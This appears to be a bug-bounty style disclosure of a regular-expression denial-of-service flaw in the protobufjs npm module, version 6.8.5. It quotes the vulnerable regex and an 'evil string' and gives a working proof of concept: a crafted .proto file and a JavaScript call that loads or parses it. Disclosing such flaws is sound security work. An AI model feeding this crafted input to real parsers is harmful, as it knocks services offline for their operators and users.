I would like to report a ReDoS in protobufjs
It allows to cause Denial of Service by trying to parse (or load) a crafted *.proto file.

Module

module name: protobufjsversion:6.8.5npm page: https://www.npmjs.com/package/[MODULE NAME]

Module Description

> Protocol Buffers are a language-neutral, platform-neutral, extensible way of serializing structured data for use in communications protocols, data storage, and more, originally designed at Google (see).

Module Stats

-22 592 downloads in the last day
352 974 downloads in the last week
1 321 151 downloads in the last month

~15 853 812 estimated downloads per year

Vulnerability

Vulnerability Description

ReDoS.

• regex: /^(?:\.?[a-zA-Z_][a-zA-Z_0-9]*)+$/
• evil string: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!
• file: https://github.com/dcodeIO/protobuf.js/blob/6.8.5/src/parse.js#L27

Steps To Reproduce:

proto file:

// awesome.proto
package awesomepackage;
syntax = "proto3";

message AwesomeMessage {
    option (my_option) = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!;
}

js file:

require('protobufjs').load("./awesome.proto", () => {});

or, just with parse:

require('protobufjs').parse(`
package awesomepackage;
syntax = "proto3";

message AwesomeMessage {
    option (my_option) = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!;
}
`, () => {});

Supporting Material/References:

• Arch Linux Current
• Node.js 9.5.0
• npm 5.6.0

Wrap up

• I contacted the maintainer to let him know: N
• I opened an issue in the related repository: N

Impact

Cause denial of service by parsing a crafted *.proto file.